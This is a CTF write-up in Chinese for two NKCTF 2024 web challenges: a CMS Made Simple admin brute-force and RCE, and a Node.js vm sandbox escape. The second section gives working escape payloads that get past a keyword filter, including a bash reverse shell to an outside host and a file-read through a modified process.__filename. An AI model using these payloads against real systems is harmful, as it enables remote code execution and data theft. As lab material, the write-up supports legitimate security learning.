当前位置: 首页 > news >正文

[NKCTF 2024]web解析

文章目录

    • my first cms
    • 全世界最简单的CTF
      • 解法一
      • 解法二


my first cms

打开题目在最下面发现是CMS Made Simple,版本为2.2.19

在这里插入图片描述

扫一下发现存在后台登陆界面,直接访问

用字典爆破下admin的密码为Admin123
在这里插入图片描述

然后直接登录,去漏洞库搜一下其实存在很多漏洞(重点看最近的)

找到CMS Made Simple的RCE漏洞(CVE-2019-9059)参考文章

步骤如下

在这里插入图片描述

登陆后按照上图,保存后去执行代码

在这里插入图片描述

成功反弹shell,得到flag

在这里插入图片描述

全世界最简单的CTF

扫目录发现存在/secret源码泄露

const express = require('express');
const bodyParser = require('body-parser');
const app = express();
const fs = require("fs");
const path = require('path');
const vm = require("vm");app
.use(bodyParser.json())
.set('views', path.join(__dirname, 'views'))
.use(express.static(path.join(__dirname, '/public')))app.get('/', function (req, res){res.sendFile(__dirname + '/public/home.html');
})function waf(code) {let pattern = /(process|\[.*?\]|exec|spawn|Buffer|\\|\+|concat|eval|Function)/g;if(code.match(pattern)){throw new Error("what can I say? hacker out!!");}
}app.post('/', function (req, res){let code = req.body.code;let sandbox = Object.create(null);let context = vm.createContext(sandbox);try {waf(code)let result = vm.runInContext(code, context);console.log(result);} catch (e){console.log(e.message);require('./hack');}
})app.get('/secret', function (req, res){if(process.__filename == null) {let content = fs.readFileSync(__filename, "utf-8");return res.send(content);} else {let content = fs.readFileSync(process.__filename, "utf-8");return res.send(content);}
})app.listen(3000, ()=>{console.log("listen on 3000");
})

本题是考察如何沙箱逃逸实现RCE,waf过滤很多,process被办意味着我们需要用别的手段去得到process对象,中括号被办就不能利用js特性拼接绕过,\被办意味着不能十六进制或者Unicode绕过。

解法一

参考LaoGong战队

我们注意到源码中的沙箱定义

let code = req.body.code;
let sandbox = Object.create(null);
let context = vm.createContext(sandbox);

create内为null,并且也没有其他可以引用的对象,这时候想要逃逸我们要用到一个函数中的内置对象的属性arguments.callee.caller,它可以返回函数的调用者。

而一般情况如果没有执行字符串操作或者利用函数重写,我们可以利用Proxy劫持

throw new Proxy({}, {get: function(){const cc = arguments.callee.caller;const p = (cc.constructor.constructor('return process'))();return p.mainModule.require('child_process').execSync('whoami').toString();}})

而本题过滤了很多,我们可以用replace函数来绕过对process的检测

const p = (cc.constructor.constructor('return proAcess'.replace('A','')))();
const obj=p.mainModule.require('child_process'.replace('A',''));

接下来是最为精彩的一步,利用javascript内置函数去返回一个属性描述符(PropertyDescriptor)对象,其中包括value也就是属性值

最终payload如下

throw new Proxy({}, {get: function(){const cc = arguments.callee.caller;const p = (cc.constructor.constructor('return procAess'.replace('A','')))();const obj = p.mainModule.require('child_procAess'.replace('A',''));const ex = Object.getOwnPropertyDescriptor(obj,'exeAcSync'.replace('A',''));return ex.value('bash -c "bash -i >& /dev/tcp/5i781963p2.yicp.fun/58265 0>&1"').toString();}})

成功反弹shell,执行/readflag得到flag

在这里插入图片描述

解法二

参考文章

我们注意下面代码

app.get('/secret', function (req, res){if(process.__filename == null) {let content = fs.readFileSync(__filename, "utf-8");return res.send(content);} else {let content = fs.readFileSync(process.__filename, "utf-8");return res.send(content);}
})

如果process.__filename为null则回显源码,我们可以利用原型链污染__filename实现任意文件读取

本解法利用反射去得到process对象

throw new Proxy({}, {get: function(){const c = arguments.callee.callerconst p = (c.constructor.constructor("return Reflect.get(global, Reflect.ownKeys(global).find(x=>x.includes('pro')))"))()return p.__filename="/etc/passwd"}
})

然后访问 /secret 即可成功读取

尝试读/flag,返回permission denied, open ‘/flag’,没权限直接读

尝试读./hack,注意路径是/app/hack.js,提示shell.js跟进一下

console.log("shell"); const p = require('child_process'); p.execSync(process.env.command);

最终payload

throw new Proxy({}, {get: function(){const c = arguments.callee.caller;const p = (c.constructor.constructor("return Reflect.get(global, Reflect.ownKeys(global).find(x=>x.includes('pro')))"))();p.env.command="whoami";return p.mainModule.require("./shell");}
})

相关文章:

  • Linux:执行命令的命令eval与Bash解析命令的方式
  • 五分钟快速搭建个人游戏网站(1Panel)
  • VUE:内置组件<Teleport>妙用
  • 输出当前时间
  • Python3 字典
  • rust学习笔记(8-12)
  • 第九届蓝桥杯大赛个人赛省赛(软件类)真题C 语言 A 组-第几个幸运数字
  • Android 开发制作系统签名
  • 关系型数据库mysql(2)SQL语句
  • 小目标检测篇 | YOLOv8改进之增加小目标检测层(针对Neck网络为AFPN)
  • 每日OJ题_栈①_力扣1047. 删除字符串中的所有相邻重复项
  • 【机器学习300问】44、P-R曲线是如何权衡精确率和召回率的?
  • React 抽屉显示和隐藏
  • 【阅读笔记】《西游记》
  • Selenium 自动化 —— 切换浏览器窗口
  • 分享的文章《人生如棋》
  • ES6系统学习----从Apollo Client看解构赋值
  • express + mock 让前后台并行开发
  • GitUp, 你不可错过的秀外慧中的git工具
  • Git初体验
  • gulp 教程
  • HTML-表单
  • IE报vuex requires a Promise polyfill in this browser问题解决
  • JavaScript函数式编程(一)
  • Objective-C 中关联引用的概念
  • Spring-boot 启动时碰到的错误
  • Webpack 4 学习01(基础配置)
  • 汉诺塔算法
  • 浅谈JavaScript的面向对象和它的封装、继承、多态
  • 项目管理碎碎念系列之一:干系人管理
  • 一个JAVA程序员成长之路分享
  • 优化 Vue 项目编译文件大小
  • 主流的CSS水平和垂直居中技术大全
  • Hibernate主键生成策略及选择
  • 长三角G60科创走廊智能驾驶产业联盟揭牌成立,近80家企业助力智能驾驶行业发展 ...
  • ​一些不规范的GTID使用场景
  • !!java web学习笔记(一到五)
  • #{} 和 ${}区别
  • #在 README.md 中生成项目目录结构
  • (1)(1.11) SiK Radio v2(一)
  • (delphi11最新学习资料) Object Pascal 学习笔记---第7章第3节(封装和窗体)
  • (定时器/计数器)中断系统(详解与使用)
  • (十) 初识 Docker file
  • (原创) cocos2dx使用Curl连接网络(客户端)
  • (转)Windows2003安全设置/维护
  • (转)用.Net的File控件上传文件的解决方案
  • (转载)虚幻引擎3--【UnrealScript教程】章节一:20.location和rotation
  • ***linux下安装xampp,XAMPP目录结构(阿里云安装xampp)
  • .MyFile@waifu.club.wis.mkp勒索病毒数据怎么处理|数据解密恢复
  • .NET : 在VS2008中计算代码度量值
  • .NET 2.0中新增的一些TryGet,TryParse等方法
  • .Net 4.0并行库实用性演练
  • .Net IOC框架入门之一 Unity
  • .NET 中什么样的类是可使用 await 异步等待的?
  • .NET/C# 异常处理:写一个空的 try 块代码,而把重要代码写到 finally 中(Constrained Execution Regions)